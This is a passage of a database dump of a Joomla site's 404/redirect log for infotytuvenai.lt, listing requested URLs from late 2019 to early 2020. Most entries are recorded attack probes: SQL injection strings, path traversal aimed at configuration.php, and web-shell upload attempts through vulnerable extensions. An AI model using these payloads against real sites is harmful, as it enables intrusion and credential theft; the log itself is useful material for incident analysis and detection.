NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:17','0000-00-00 00:00:00'),(3269,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:17','0000-00-00 00:00:00'),(3270,'http://infotytuvenai.lt/index.php/lt/?option=com_content\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:18','0000-00-00 00:00:00'),(3271,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' ORDER BY 1#&view=article&id=305','','','',1,0,'2019-10-17 12:12:19','0000-00-00 00:00:00'),(3272,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:19','0000-00-00 00:00:00'),(3273,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:20','0000-00-00 00:00:00'),(3274,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:20','0000-00-00 00:00:00'),(3275,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:21','0000-00-00 00:00:00'),(3276,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:21','0000-00-00 00:00:00'),(3277,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:33','0000-00-00 00:00:00'),(3278,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:34','0000-00-00 00:00:00'),(3279,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:34','0000-00-00 00:00:00'),(3280,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:35','0000-00-00 00:00:00'),(3281,'http://infotytuvenai.lt/index.php/lt/?option=com_content%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=article&id=305','','','',1,0,'2019-10-17 12:12:36','0000-00-00 00:00:00'),(3282,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=9874','','','',1,0,'2019-10-17 12:14:34','0000-00-00 00:00:00'),(3283,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3836','','','',1,0,'2019-10-17 12:14:35','0000-00-00 00:00:00'),(3284,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CASE WHEN (1200=7991) THEN 1200 ELSE 1200*(SELECT 1200 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))','','','',1,0,'2019-10-17 12:15:18','0000-00-00 00:00:00'),(3285,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CASE WHEN (6648=6648) THEN 6648 ELSE 6648*(SELECT 6648 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))','','','',1,0,'2019-10-17 12:15:18','0000-00-00 00:00:00'),(3286,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT 2977 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(2977=2977,1))),0x7162717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)','','','',1,0,'2019-10-17 12:15:38','0000-00-00 00:00:00'),(3287,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CONCAT(0x7170707171,(SELECT (ELT(6418=6418,1))),0x7162717171))','','','',1,0,'2019-10-17 12:15:39','0000-00-00 00:00:00'),(3288,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (9764=9764) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)))','','','',1,0,'2019-10-17 12:15:39','0000-00-00 00:00:00'),(3289,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (7649=7649) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113))','','','',1,0,'2019-10-17 12:15:40','0000-00-00 00:00:00'),(3290,'http://www.infotytuvenai.lt/index.php/lt/apgyvetytuvenaidinimas','','','',1,0,'2019-10-21 17:18:28','0000-00-00 00:00:00'),(3291,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1572008234.php','','','',1,0,'2019-10-25 12:57:43','0000-00-00 00:00:00'),(3292,'http://infotytuvenai.lt/index.php?option=Exploit Prv8 &c=import&view=import&filetype=csv&table=1','','','',1,0,'2019-10-25 13:00:50','0000-00-00 00:00:00'),(3293,'http://infotytuvenai.lt/index.php/lt/?option=Exploit Prv8 &format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','','','',1,0,'2019-10-25 13:00:52','0000-00-00 00:00:00'),(3294,'http://infotytuvenai.lt//index.php?option=com_myblog&task=ajaxupload','','','',14,0,'2019-10-25 13:57:11','0000-00-00 00:00:00'),(3295,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1572082888.php','','','',1,0,'2019-10-26 09:43:12','0000-00-00 00:00:00'),(3296,'http://infotytuvenai.lt/index.php?option=com_agora&task=upload','','','',2,0,'2019-10-26 16:45:26','0000-00-00 00:00:00'),(3297,'http://infotytuvenai.lt/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1','','','',6,0,'2019-10-26 16:45:28','0000-00-00 00:00:00'),(3298,'http://infotytuvenai.lt/index.php?option=com_jimtawl&view=upload&task=upload&pop=true&tmpl=component','','','',6,0,'2019-10-26 16:45:29','0000-00-00 00:00:00'),(3299,'http://infotytuvenai.lt/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1','','','',6,0,'2019-10-26 16:45:30','0000-00-00 00:00:00'),(3300,'http://infotytuvenai.lt/index.php/lt/index.php/contato.html','','','',42,0,'2019-10-27 12:12:17','0000-00-00 00:00:00'),(3301,'http://infotytuvenai.lt/index.php/lt/index.php/contact','','','',10,0,'2019-10-27 12:12:19','0000-00-00 00:00:00'),(3302,'http://infotytuvenai.lt/index.php/lt/index.php/contact/adres','','','',10,0,'2019-10-27 12:12:20','0000-00-00 00:00:00'),(3303,'http://infotytuvenai.lt/index.php/lt/index.php/kontakty','','','',32,0,'2019-10-27 12:12:22','0000-00-00 00:00:00'),(3304,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=','','','',8,0,'2019-10-27 12:12:57','0000-00-00 00:00:00'),(3305,'http://infotytuvenai.lt/index.php/lt/?option=com_poll&task=results&id=14&mosmsg=DOS<<>AAA<><>','','','',5,0,'2019-10-27 12:13:03','0000-00-00 00:00:00'),(3306,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&Itemid=1','','','',54,0,'2019-10-27 12:13:14','0000-00-00 00:00:00'),(3307,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_community&view=groups&groupid=1&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&Itemid=0','','','',30,0,'2019-10-27 12:13:16','0000-00-00 00:00:00'),(3308,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1572218741.php','','','',1,0,'2019-10-27 23:29:01','0000-00-00 00:00:00'),(3309,'http://infotytuvenai.lt/index.php/lt/LeYA1NrAhlb/pGAZK2PO2IN/NQOIZEpSqHWQn6xTprB/ImyMqSdm9zREJXoV4t','','','',1,0,'2019-10-30 00:54:42','0000-00-00 00:00:00'),(3310,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../','','','',22,0,'2019-10-31 02:22:05','0000-00-00 00:00:00'),(3311,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_foxcontact&view=invalid','','','',20,0,'2019-10-31 02:23:42','0000-00-00 00:00:00'),(3312,'http://infotytuvenai.lt//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form\"','','','',19,0,'2019-10-31 02:23:53','0000-00-00 00:00:00'),(3313,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../Vuln.php','','','',18,0,'2019-10-31 02:26:27','0000-00-00 00:00:00'),(3314,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_jwallpapers&task=upload','','','',46,0,'2019-10-31 02:30:09','0000-00-00 00:00:00'),(3315,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_addproperty&task=listing&propertyId=73&action=filedownload&fname=../configuration.php','','','',24,0,'2019-10-31 02:35:18','0000-00-00 00:00:00'),(3316,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_jetext&task=download&file=../../configuration.phF','','','',20,0,'2019-10-31 02:35:43','0000-00-00 00:00:00'),(3317,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_jetext&task=download&file=../../configuration.php','','','',4,0,'2019-10-31 02:36:26','0000-00-00 00:00:00'),(3318,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_community&view=groups&groupid=33&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&Itemid=0','','','',24,0,'2019-10-31 02:36:31','0000-00-00 00:00:00'),(3319,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_download-monitor&file=configuration.php','','','',21,0,'2019-10-31 02:36:59','0000-00-00 00:00:00'),(3320,'http://www.infotytuvenai.lt//index.php?option=com_jwallpapers&task=upload','','','',1,0,'2019-10-31 10:34:27','0000-00-00 00:00:00'),(3321,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1572594698.php','','','',1,0,'2019-11-01 07:53:47','0000-00-00 00:00:00'),(3322,'http://infotytuvenai.lt/index.php/lt/?option=com_biblestudy&view=mediafileform&layout=edit&id=1','','','',1,0,'2019-11-02 16:23:56','0000-00-00 00:00:00'),(3323,'http://infotytuvenai.lt/index.php/lt/?option=com_jssupportticket','','','',1,0,'2019-11-02 16:24:02','0000-00-00 00:00:00'),(3324,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1572843396.php','','','',1,0,'2019-11-04 12:00:30','0000-00-00 00:00:00'),(3325,'http://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1572881042.php','','','',1,0,'2019-11-04 22:26:23','0000-00-00 00:00:00'),(3326,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1572881042.php','','','',1,0,'2019-11-04 22:26:29','0000-00-00 00:00:00'),(3327,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=','','','',9,0,'2019-11-06 16:21:01','0000-00-00 00:00:00'),(3328,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',9,0,'2019-11-06 16:21:45','0000-00-00 00:00:00'),(3329,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',9,0,'2019-11-06 16:21:47','0000-00-00 00:00:00'),(3330,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',8,0,'2019-11-06 16:21:53','0000-00-00 00:00:00'),(3331,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Files/shell.jpg','','','',16,0,'2019-11-06 16:22:38','0000-00-00 00:00:00'),(3332,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_agora&task=upload?name=Vuln.php','','','',16,0,'2019-11-06 16:22:41','0000-00-00 00:00:00'),(3333,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1','','','',16,0,'2019-11-06 16:22:47','0000-00-00 00:00:00'),(3334,'http://infotytuvenai.lt//index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en','','','',19,0,'2019-11-06 16:22:49','0000-00-00 00:00:00'),(3335,'http://www.infotytuvenai.lt/index.php/lt/index.php/contact','','','',1,0,'2019-11-06 17:03:38','0000-00-00 00:00:00'),(3336,'http://www.infotytuvenai.lt/index.php/lt/index.php/contact/adres','','','',1,0,'2019-11-06 17:03:39','0000-00-00 00:00:00'),(3337,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&Itemid=1','','','',1,0,'2019-11-06 17:03:50','0000-00-00 00:00:00'),(3338,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_community&view=groups&groupid=1&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&Itemid=0','','','',1,0,'2019-11-06 17:03:53','0000-00-00 00:00:00'),(3339,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Skrt_157333933.php','','','',1,0,'2019-11-09 15:16:16','0000-00-00 00:00:00'),(3340,'http://www.infotytuvenai.lt/index.php/lt/null','','','',1,0,'2019-11-09 15:58:53','0000-00-00 00:00:00'),(3341,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1573313448.php','','','',1,0,'2019-11-09 16:13:42','0000-00-00 00:00:00'),(3342,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=','','','',1,0,'2019-11-11 16:56:46','0000-00-00 00:00:00'),(3343,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_installer&view=archive','','','',2,0,'2019-11-11 16:56:51','0000-00-00 00:00:00'),(3344,'http://infotytuvenai.lt//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1','','','',3,0,'2019-11-11 16:59:51','0000-00-00 00:00:00'),(3345,'http://infotytuvenai.lt//index.php?option=com_jimtawl&view=upload&task=upload&pop=true&tmpl=component','','','',3,0,'2019-11-11 16:59:57','0000-00-00 00:00:00'),(3346,'http://infotytuvenai.lt//index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1','','','',3,0,'2019-11-11 17:00:00','0000-00-00 00:00:00'),(3347,'http://infotytuvenai.lt//index.php?option=com_agora&task=upload','','','',2,0,'2019-11-17 20:43:50','0000-00-00 00:00:00'),(3348,'http://infotytuvenai.lt//index.php?option=com_jwallpapers&task=upload','','','',2,0,'2019-11-17 20:45:40','0000-00-00 00:00:00'),(3349,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_user&view=reset&layout=confirm','','','',2,0,'2019-11-17 20:53:33','0000-00-00 00:00:00'),(3350,'http://infotytuvenai.lt/index.php/lt/?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php','','','',1,0,'2019-11-18 10:18:44','0000-00-00 00:00:00'),(3351,'http://infotytuvenai.lt/index.php/lt/?option=com_rsfiles&task=download&path=../../configuration.php&Itemid=137','','','',1,0,'2019-11-18 10:18:47','0000-00-00 00:00:00'),(3352,'http://www.infotytuvenai.lt/index.php/lt/l','','','',1,0,'2019-11-19 14:41:32','0000-00-00 00:00:00'),(3353,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../vuln.php','','','',906,0,'2019-11-19 20:40:30','0000-00-00 00:00:00'),(3354,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1574206467.php','','','',1,0,'2019-11-20 00:05:05','0000-00-00 00:00:00'),(3355,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1574270660.php','','','',3,0,'2019-11-20 17:35:11','0000-00-00 00:00:00'),(3356,'http://infotytuvenai.lt/index.php/lt/infotytuvenai.lt','','http://infotytuvenai.lt/infotytuvenai.lt','',1,0,'2019-11-21 16:32:26','0000-00-00 00:00:00'),(3357,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1574388029.php','','','',1,0,'2019-11-22 02:12:37','0000-00-00 00:00:00'),(3358,'http://infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload','','http://www.google.com/','',2,0,'2019-11-23 09:50:07','0000-00-00 00:00:00'),(3359,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1574592652.php','','','',1,0,'2019-11-24 11:21:49','0000-00-00 00:00:00'),(3360,'http://www.infotytuvenai.lt/index.php/lt/de/apie-centra/edukacines-programos','','','',1,0,'2019-11-28 13:10:18','0000-00-00 00:00:00'),(3361,'http://www.infotytuvenai.lt/index.php/lt/de','','','',1,0,'2019-11-28 13:11:11','0000-00-00 00:00:00'),(3362,'http://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../vuln.php','','','',9,0,'2019-11-29 07:34:46','0000-00-00 00:00:00'),(3363,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_157542694.php','','','',1,0,'2019-12-04 03:06:16','0000-00-00 00:00:00'),(3364,'http://infotytuvenai.lt/index.php/lt/kontakty','','','',1,0,'2019-12-04 15:06:10','0000-00-00 00:00:00'),(3365,'http://infotytuvenai.lt/index.php/lt/contato.html','','','',1,0,'2019-12-04 15:06:39','0000-00-00 00:00:00'),(3366,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1575846052.php','','','',2,0,'2019-12-08 23:01:50','0000-00-00 00:00:00'),(3367,'http://infotytuvenai.lt/index.php/lt/?option=com_jimtawl&view=upload&task=upload&pop=true&tmpl=component','','','',9,0,'2019-12-10 00:18:07','0000-00-00 00:00:00'),(3369,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1576272433.php','','','',1,0,'2019-12-13 21:55:18','0000-00-00 00:00:00'),(3370,'http://infotytuvenai.lt/index.php/lt/license.txt','','http://infotytuvenai.lt/index.php/lt/','',4,0,'2019-12-14 03:26:32','0000-00-00 00:00:00'),(3371,'http://infotytuvenai.lt/index.php/lt/readme.html','','http://infotytuvenai.lt/index.php/lt/','',4,0,'2019-12-14 03:26:33','0000-00-00 00:00:00'),(3372,'http://infotytuvenai.lt/index.php/lt/admin.php','','http://infotytuvenai.lt/index.php/lt/','',4,0,'2019-12-14 03:26:34','0000-00-00 00:00:00'),(3373,'http://infotytuvenai.lt/index.php/lt/admin/login.php','','http://infotytuvenai.lt/index.php/lt/','',4,0,'2019-12-14 03:26:36','0000-00-00 00:00:00'),(3374,'http://infotytuvenai.lt/index.php/lt/administrator','','http://infotytuvenai.lt/index.php/lt/','',4,0,'2019-12-14 03:26:48','0000-00-00 00:00:00'),(3375,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_157654056.php','','','',1,0,'2019-12-16 23:57:07','0000-00-00 00:00:00'),(3376,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1576617439.php','','','',1,0,'2019-12-17 21:54:27','0000-00-00 00:00:00'),(3377,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1576663734.php','','','',2,0,'2019-12-18 11:28:36','0000-00-00 00:00:00'),(3378,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1576938724.php','','','',1,0,'2019-12-21 14:43:59','0000-00-00 00:00:00'),(3379,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../attari.php','','','',2,0,'2019-12-22 03:15:45','0000-00-00 00:00:00'),(3380,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../vuln.php','','','',28,0,'2019-12-25 09:08:32','0000-00-00 00:00:00'),(3381,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1577313414.php','','','',1,0,'2019-12-26 00:15:10','0000-00-00 00:00:00'),(3382,'http://infotytuvenai.lt/index.php/lt/2012-12-09-18-26-13/2012-12-11-19-49-19/18-2015-04-22-12-43-12','','','',1,0,'2019-12-26 03:00:05','0000-00-00 00:00:00'),(3383,'http://infotytuvenai.lt/index.php/lt//wp-json/wp/v2/users/','','','',2,0,'2019-12-27 15:53:03','0000-00-00 00:00:00'),(3384,'http://infotytuvenai.lt/index.php/lt//xmlrpc.php','','','',3,0,'2019-12-27 15:53:05','0000-00-00 00:00:00'),(3385,'http://www.infotytuvenai.lt/index.php/lt/lankytini-','','','',8,0,'2019-12-29 03:11:16','0000-00-00 00:00:00'),(3386,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../vuln.php','','','',18,0,'2019-12-30 17:28:13','0000-00-00 00:00:00'),(3387,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_jwallpapers&task=upload','','','',18,0,'2019-12-30 17:28:16','0000-00-00 00:00:00'),(3388,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1577993038.php','','','',2,0,'2020-01-02 19:31:06','0000-00-00 00:00:00'),(3389,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../kaizer.php','','','',5,0,'2020-01-04 20:13:54','0000-00-00 00:00:00'),(3390,'http://infotytuvenai.lt/index.php/lt/?option=com_agora&task=upload?name=kaizer.php','','','',5,0,'2020-01-04 20:15:09','0000-00-00 00:00:00'),(3391,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1579104734.php','','','',1,0,'2020-01-16 16:37:03','0000-00-00 00:00:00'),(3392,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1579130443.php','','','',1,0,'2020-01-16 22:45:07','0000-00-00 00:00:00'),(3393,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1579208055.php','','','',1,0,'2020-01-17 22:31:25','0000-00-00 00:00:00'),(3394,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','','','',2,0,'2020-01-17 22:31:42','0000-00-00 00:00:00'),(3395,'http://www.infotytuvenai.lt//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form\"','','','',2,0,'2020-01-17 22:32:17','0000-00-00 00:00:00'),(3396,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1579722146.php','','','',1,0,'2020-01-23 19:09:30','0000-00-00 00:00:00'),(3397,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1579917038.php','','','',1,0,'2020-01-25 02:20:59','0000-00-00 00:00:00'),(3398,'http://infotytuvenai.lt/index.php/lt/?option=com_tag&controller=tag&tmpl=component&task=add','','','',1,0,'2020-01-25 16:44:55','0000-00-00 00:00:00'),(3399,'http://infotytuvenai.lt/index.php/lt/?option=com_myblog&tmpl=component','','','',1,0,'2020-01-25 16:44:55','0000-00-00 00:00:00'),(3400,'http://infotytuvenai.lt/index.php/lt/?option=com_seyret&tmpl=component','','','',1,0,'2020-01-25 16:44:56','0000-00-00 00:00:00'),(3401,'http://infotytuvenai.lt/index.php/lt/?option=com_facileforms&tmpl=component','','','',1,0,'2020-01-25 16:44:57','0000-00-00 00:00:00'),(3402,'http://infotytuvenai.lt/index.php/lt/?option=com_chronocontact&tmpl=component','','','',1,0,'2020-01-25 16:44:58','0000-00-00 00:00:00'),(3403,'http://infotytuvenai.lt/index.php/lt/component/k2/item/1','','','',1,0,'2020-02-02 19:31:56','0000-00-00 00:00:00'),(3404,'http://www.infotytuvenai.lt/index.php/lt/administrator/manifests/files/joomla.xml','','https://sucuri.net','',7,0,'2020-02-12 18:33:22','0000-00-00 00:00:00'),(3405,'http://www.infotytuvenai.lt/index.php/lt/language/en-GB/en-GB.com_users.ini','','https://sucuri.net','',7,0,'2020-02-12 18:33:23','0000-00-00 00:00:00'),(3406,'http://www.infotytuvenai.lt/index.php/lt/media/media/js/mediamanager.js','','https://sucuri.net','',7,0,'2020-02-12 18:33:24','0000-00-00 00:00:00'),(3407,'http://www.infotytuvenai.lt/index.php/lt/includes/js/joomla.javascript.js','','https://sucuri.net','',7,0,'2020-02-12 18:33:24','0000-00-00 00:00:00'),(3408,'http://infotytuvenai.lt/index.php/lt/language/en-GB/en-GB.com_users.ini','','https://sucuri.net','',1,0,'2020-02-13 19:54:44','0000-00-00 00:00:00'),(3409,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1581781541.php','','','',1,0,'2020-02-15 15:49:23','0000-00-00 00:00:00'),(3410,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1581784012.php','','','',1,0,'2020-02-15 17:03:05','0000-00-00 00:00:00'),(3411,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1581784758.php','','','',1,0,'2020-02-15 17:08:53','0000-00-00 00:00:00'),(3412,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1582139513.php','','','',1,0,'2020-02-19 19:28:52','0000-00-00 00:00:00'),(3413,'http://infotytuvenai.lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../vuln.php','','','',1,0,'2020-03-01 14:16:24','0000-00-00 00:00:00'),(3414,'http://infotytuvenai.lt/index.php/lt/images/logas be fono 1.png','','','',1,0,'2020-03-03 00:27:17','0000-00-00 00:00:00'),(3415,'http://infotytuvenai.lt/index.php/lt/images/Lietuvos LEADER logotipas 1.jpg','','','',1,0,'2020-03-03 20:23:35','0000-00-00 00:00:00'),(3416,'http://infotytuvenai.lt/index.php/lt/images/KPF.jpg','','','',1,0,'2020-03-03 22:12:30','0000-00-00 00:00:00'),(3417,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1583430209.php','','','',1,0,'2020-03-05 17:44:56','0000-00-00 00:00:00'),(3418,'http://infotytuvenai.lt/index.php/lt/login','','','',4,0,'2020-03-09 14:30:23','0000-00-00 00:00:00'),(3419,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1583978569.php','','','',1,0,'2020-03-12 04:03:48','0000-00-00 00:00:00'),(3420,'http://infotytuvenai.lt/index.php/lt/?option=com_community&view=register','','','',1,0,'2020-03-12 19:40:56','0000-00-00 